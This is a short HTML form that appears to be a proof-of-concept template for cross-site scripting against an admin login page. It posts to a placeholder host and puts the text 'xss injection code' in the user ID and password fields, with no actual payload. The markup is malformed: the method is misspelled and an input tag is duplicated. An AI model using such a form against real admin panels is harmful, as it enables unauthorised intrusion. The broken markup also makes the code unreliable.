<form method="pst" action="http://www.example.com/[admin_Path]/index.php"> <input type="text" name="txtuserid" class="INPUT" size="30" value="xss injection code"> <br> <input type="password" name="txtpass" class="INPUT" size="30" value="xss injection code"> <br> <input <input type="submit" value="submit" class="button"> </form>